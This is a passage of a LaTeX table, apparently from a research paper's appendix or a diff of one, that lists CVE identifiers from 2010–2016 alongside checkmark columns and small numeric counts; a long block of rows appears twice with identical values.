& /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2014-0225 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule +CVE-2014-1202 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 96 & & \\ \midrule +CVE-2014-1402 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 2 & 124 & 150 & 150 \\ \midrule +CVE-2014-1403 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 180 & & \\ \midrule +CVE-2014-1604 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-1830 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2014-1832 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-1858 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-1859 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-1869 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & /checkmark & 1 & 110 & & \\ \midrule +CVE-2014-1904 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule +CVE-2014-1932 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 124 & & \\ \midrule +CVE-2014-1933 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 116 & & \\ \midrule +CVE-2014-2053 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 192 & & \\ \midrule +CVE-2014-2235 & /checkmark & & & & & /checkmark & & & /checkmark & & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-2525 & & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 56 & & \\ \midrule +CVE-2014-3007 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule +CVE-2014-3488 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule +CVE-2014-3506 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 190 & & \\ \midrule +CVE-2014-3511 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 182 & & \\ \midrule +CVE-2014-3576 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 52 & & \\ \midrule +CVE-2014-3578 & /checkmark & & & & & & & & & & & & & & & /checkmark & 1 & 66 & & \\ \midrule +CVE-2014-3579 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 146 & & \\ \midrule +CVE-2014-3599 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule +CVE-2014-3600 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 138 & & \\ \midrule +CVE-2014-3625 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule +CVE-2014-3741 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-3995 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 134 & & \\ \midrule +CVE-2014-4658 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule +CVE-2014-6394 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-7143 & & & & & & & /checkmark & & /checkmark & & & & & & & & 2 & 44 & 46 & 46 \\ \midrule +CVE-2014-7192 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-7193 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule +CVE-2014-7202 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 3 & 138 & 150 & 142 \\ \midrule +CVE-2014-7203 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule +CVE-2014-7205 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-8115 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 80 & & \\ \midrule +CVE-2014-8176 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule +CVE-2014-8650 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2014-8681 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-8682 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-8991 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-9130 & /checkmark & & & & & /checkmark & & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-9682 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-9720 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-9721 & /checkmark & & & & & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & 2 & 142 & 154 & 154 \\ \midrule +CVE-2014-10068 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-10077 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-0206 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & 1 & 194 & & \\ \midrule +CVE-2015-0209 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 182 & & \\ \midrule +CVE-2015-0288 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 188 & & \\ \midrule +CVE-2015-0838 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2015-0846 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-1326 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 178 & & \\ \midrule +CVE-2015-1782 & & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-1788 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 186 & & \\ \midrule +CVE-2015-1791 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & /checkmark & 1 & 192 & & \\ \midrule +CVE-2015-1792 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 194 & & \\ \midrule +CVE-2015-2068 & & & & & & /checkmark & /checkmark & & /checkmark & & /checkmark & & & & & & 7 & 56 & 60 & 56 \\ \midrule +CVE-2015-2156 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 82 & & \\ \midrule +CVE-2015-2296 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-2912 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & & 1 & 162 & & \\ \midrule +CVE-2015-2913 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2015-3010 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 142 & & \\ \midrule +CVE-2015-3195 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 196 & & \\ \midrule +CVE-2015-3196 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-3220 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule +CVE-2015-3253 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-4053 & & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 110 & & \\ \midrule +CVE-2015-4082 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-4412 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-4619 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-4706 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 80 & & \\ \midrule +CVE-2015-5081 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2015-5147 & /checkmark & & & & & & & & & & & & & & & & 1 & 64 & & \\ \midrule +CVE-2015-5159 & /checkmark & & & & & & & & & & & & & & & & 1 & 160 & & \\ \midrule +CVE-2015-5211 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule +CVE-2015-5253 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2015-5254 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 148 & & \\ \midrule +CVE-2015-5607 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2015-6748 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2015-7294 & /checkmark & & & & & /checkmark & & /checkmark & & & /checkmark & & & /checkmark & & & 1 & 150 & & \\ \midrule +CVE-2015-7314 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-7316 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 98 & & \\ \midrule +CVE-2015-7559 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 156 & & \\ \midrule +CVE-2015-7809 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2015-8213 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2015-8309 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 168 & & \\ \midrule +CVE-2015-8310 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-8747 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-8748 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-8814 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2015-8968 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 130 & & \\ \midrule +CVE-2015-9235 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2015-9243 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule +CVE-2015-9251 & /checkmark & & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & /checkmark & & /checkmark & 1 & 156 & & \\ \midrule +CVE-2016-0750 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 72 & & \\ \midrule +CVE-2010-0684 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 66 & & \\ \midrule +CVE-2010-2245 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & & 3 & 22 & 104 & 50 \\ \midrule +CVE-2010-5312 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2011-1772 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule +CVE-2011-1950 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 58 & & \\ \midrule +CVE-2011-2732 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule +CVE-2011-3871 & & & & & & & & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 104 & & \\ \midrule +CVE-2011-4104 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule +CVE-2011-4461 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule +CVE-2011-4838 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 174 & & \\ \midrule +CVE-2011-5036 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule +CVE-2012-1109 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule +CVE-2012-1176 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 150 & & \\ \midrule +CVE-2012-2139 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2012-2417 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 122 & & \\ \midrule +CVE-2012-3366 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule +CVE-2012-3408 & /checkmark & & & & & /checkmark & & & /checkmark & & & & & & & & 1 & 108 & & \\ \midrule +CVE-2012-3458 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2012-3865 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2012-4386 & & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 74 & & \\ \midrule +CVE-2012-4387 & & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 82 & & \\ \midrule +CVE-2012-4520 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2012-5812 & & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 52 & & \\ \midrule +CVE-2012-6550 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 132 & & \\ \midrule +CVE-2012-6662 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2012-6684 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2012-6685 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2013-0256 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 192 & & \\ \midrule +CVE-2013-0262 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 178 & & \\ \midrule +CVE-2013-0263 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 170 & & \\ \midrule +CVE-2013-0294 & /checkmark & & & & & /checkmark & & & & & & & & & & & 1 & 104 & & \\ \midrule +CVE-2013-1607 & & & & & & & & & & & & & & & & & 3 & 32 & 34 & 32 \\ \midrule +CVE-2013-1801 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2013-1812 & /checkmark & & & & & & & /checkmark & & /checkmark & & /checkmark & & /checkmark & & & 1 & 146 & & \\ \midrule +CVE-2013-1879 & & & & & & /checkmark & & & & /checkmark & /checkmark & & & & & & 1 & 82 & & \\ \midrule +CVE-2013-1880 & & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 86 & & \\ \midrule +CVE-2013-2013 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule +CVE-2013-2035 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 84 & & \\ \midrule +CVE-2013-2132 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-2191 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule +CVE-2013-3300 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2013-4002 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 2 & 34 & 46 & 46 \\ \midrule +CVE-2013-4111 & & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 56 & & \\ \midrule +CVE-2013-4116 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule +CVE-2013-4249 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-4353 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 188 & & \\ \midrule +CVE-2013-4413 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 118 & & \\ \midrule +CVE-2013-4477 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 132 & & \\ \midrule +CVE-2013-4562 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2013-4701 & /checkmark & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule +CVE-2013-5093 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-5123 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2013-6044 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule +CVE-2013-6348 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule +CVE-2013-6429 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2013-6430 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2013-6465 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule +CVE-2013-7370 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule +CVE-2013-7397 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 144 & & \\ \midrule +CVE-2013-7398 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule +CVE-2013-7459 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2014-0012 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & & 2 & 108 & 138 & 138 \\ \midrule +CVE-2014-0072 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-0073 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-0110 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule +CVE-2014-0120 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-0121 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-0177 & /checkmark & & & & & /checkmark & & & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule +CVE-2014-0193 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule +CVE-2014-0225 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule +CVE-2014-1202 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 96 & & \\ \midrule +CVE-2014-1402 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 2 & 124 & 150 & 150 \\ \midrule +CVE-2014-1403 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 180 & & \\ \midrule +CVE-2014-1604 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-1830 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2014-1832 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-1858 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-1859 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-1869 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & /checkmark & 1 & 110 & & \\ \midrule +CVE-2014-1904 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule +CVE-2014-1932 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 124 & & \\ \midrule +CVE-2014-1933 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 116 & & \\ \midrule +CVE-2014-2053 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 192 & & \\ \midrule +CVE-2014-2235 & /checkmark & & & & & /checkmark & & & /checkmark & & /checkmark & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-2525 & & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 56 & & \\ \midrule +CVE-2014-3007 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule +CVE-2014-3488 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule +CVE-2014-3506 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 190 & & \\ \midrule +CVE-2014-3511 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 182 & & \\ \midrule +CVE-2014-3576 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 52 & & \\ \midrule +CVE-2014-3578 & /checkmark & & & & & & & & & & & & & & & /checkmark & 1 & 66 & & \\ \midrule +CVE-2014-3579 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 146 & & \\ \midrule +CVE-2014-3599 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule +CVE-2014-3600 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 138 & & \\ \midrule +CVE-2014-3625 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule +CVE-2014-3741 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-3995 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 134 & & \\ \midrule +CVE-2014-4658 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule +CVE-2014-6394 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-7143 & & & & & & & /checkmark & & /checkmark & & & & & & & & 2 & 44 & 46 & 46 \\ \midrule +CVE-2014-7192 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule +CVE-2014-7193 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule +CVE-2014-7202 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 3 & 138 & 150 & 142 \\ \midrule +CVE-2014-7203 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule +CVE-2014-7205 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-8115 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 80 & & \\ \midrule +CVE-2014-8176 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule +CVE-2014-8650 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule +CVE-2014-8681 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-8682 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & & 1 & 124 & & \\ \midrule +CVE-2014-8991 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-9130 & /checkmark & & & & & /checkmark & & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-9682 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule +CVE-2014-9720 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule +CVE-2014-9721 & /checkmark & & & & & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & 2 & 142 & 154 & 154 \\ \midrule +CVE-2014-10068 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2014-10077 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule +CVE-2015-0206 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & 1 & 194 & & \\ \midrule +CVE-2015-0209 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 182 & & \\ \midrule +CVE-2015-0288 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 188 & & \\ \midrule +CVE-2015-0838 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule +CVE-2015-0846 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-1326 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 178 & & \\ \midrule +CVE-2015-1782 & & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule +CVE-2015-1788 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 186 & & \\ \midrule +CVE-2015-1791 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & /checkmark & 1 & 192 & & \\ \midrule +CVE-2015-1792 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & 